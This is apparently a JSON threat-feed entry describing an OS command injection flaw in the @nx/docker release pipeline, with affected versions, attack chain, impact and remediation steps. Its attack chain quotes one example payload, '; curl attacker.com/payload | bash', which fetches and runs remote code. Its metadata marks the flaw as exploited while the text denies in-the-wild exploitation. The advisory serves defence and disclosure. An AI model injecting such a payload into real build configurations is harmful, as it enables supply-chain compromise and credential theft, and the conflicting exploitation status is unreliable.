{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","favicon":"https://feed.craftedsignal.io/favicon-32x32.png","feed_url":"https://feed.craftedsignal.io/products/@nx/docker--21.4.0--22.7.8--23.0.0--23.1.1/feed.json","home_page_url":"https://feed.craftedsignal.io/","icon":"https://feed.craftedsignal.io/apple-touch-icon.png","items":[{"_cs_actors":[],"_cs_cpes":["cpe:2.3:a:nx:nx_docker:*:*:*:*:*:*:*:*"],"_cs_cves":[{"id":"CVE-2026-104859"}],"_cs_exploited":true,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["@nx/docker (\u003e= 21.4.0, \u003c 22.7.8; \u003e= 23.0.0, \u003c 23.1.1)"],"_cs_severities":["high"],"_cs_tags":[],"_cs_type":"threat","_cs_vendors":["Nx"],"content_html":"\u003cp\u003eThe @nx/docker package contains an OS command injection vulnerability (CVE-2026-104859) within its release pipeline logic. During the execution of \u003ccode\u003enx release version\u003c/code\u003e or \u003ccode\u003enx release publish\u003c/code\u003e, the package constructs \u003ccode\u003edocker\u003c/code\u003e CLI commands by concatenating strings derived from the \u003ccode\u003erelease.docker.repositoryName\u003c/code\u003e and \u003ccode\u003eregistryUrl\u003c/code\u003e fields in the Nx configuration. Because these constructed strings are passed directly to \u003ccode\u003e/bin/sh -c\u003c/code\u003e, an attacker with control over the Nx configuration - such as a contributor to a repository or an actor who can submit a pull request - can inject arbitrary shell commands. These commands execute with the security context of the CI/CD job, which typically includes elevated privileges, access to registry credentials, and sensitive cloud tokens. The vulnerability is present in versions 21.4.0 through 22.7.7 and 23.0.0 through 23.1.0. Even \u003ccode\u003e--dry-run\u003c/code\u003e operations are insufficient for mitigation, as some injected commands execute prior to the dry-run validation logic.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains access to modify the Nx configuration file within a project.\u003c/li\u003e\n\u003cli\u003eThe attacker updates the \u003ccode\u003erelease.docker.repositoryName\u003c/code\u003e or \u003ccode\u003eregistryUrl\u003c/code\u003e configuration field to include shell command injection payloads (e.g., \u003ccode\u003e; curl attacker.com/payload | bash\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe target CI/CD environment or a developer triggers the \u003ccode\u003enx release version\u003c/code\u003e command as part of the release lifecycle.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003e@nx/docker\u003c/code\u003e package reads the malicious configuration string.\u003c/li\u003e\n\u003cli\u003eThe package constructs a shell command string using the attacker-supplied input.\u003c/li\u003e\n\u003cli\u003eThe package executes the constructed string using \u003ccode\u003e/bin/sh -c\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe system interprets the injected shell syntax, executing the attacker's payload with the CI/CD agent's permissions.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves code execution to exfiltrate credentials or compromise the build environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows for arbitrary code execution in CI/CD environments. Since release jobs often require privileged access to container registries and secret management stores, an attacker can leverage this access to exfiltrate credentials, inject malicious code into build artifacts, or gain unauthorized access to underlying infrastructure. There is no evidence of in-the-wild exploitation currently, but the high impact on secure supply chain integrity necessitates immediate remediation.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUpgrade all instances of \u003ccode\u003e@nx/docker\u003c/code\u003e to versions 22.7.8 or 23.1.1 or later using \u003ccode\u003enx migrate 23.1.1\u003c/code\u003e or equivalent dependency manager updates.\u003c/li\u003e\n\u003cli\u003eAudit all existing Nx configuration files for anomalous \u003ccode\u003erepositoryName\u003c/code\u003e or \u003ccode\u003eregistryUrl\u003c/code\u003e values that contain shell metacharacters or unexpected command strings.\u003c/li\u003e\n\u003cli\u003eDelete any Docker version files generated by vulnerable versions of \u003ccode\u003e@nx/docker\u003c/code\u003e to ensure that previously interpolated malicious references are not read during subsequent publishing tasks.\u003c/li\u003e\n\u003cli\u003eRestrict CI/CD environment access to configuration-modifying operations to trusted personnel only, reducing the likelihood of malicious modifications to build metadata.\u003c/li\u003e\n\u003c/ol\u003e\n","date_modified":"2026-10-06T00:45:25Z","date_published":"2026-10-06T00:45:25Z","id":"https://feed.craftedsignal.io/briefs/2026-10-nx-docker-injection/","summary":"The @nx/docker package is vulnerable to OS command injection via insecure shell command construction, allowing arbitrary command execution during release processes through malicious configuration inputs.","title":"OS Command Injection in @nx/docker Release Pipeline","url":"https://feed.craftedsignal.io/briefs/2026-10-nx-docker-injection/"}],"language":"en","title":"CraftedSignal Threat Feed - @Nx/Docker (\u003e= 21.4.0, \u003c 22.7.8; \u003e= 23.0.0, \u003c 23.1.1)","version":"https://jsonfeed.org/version/1.1"}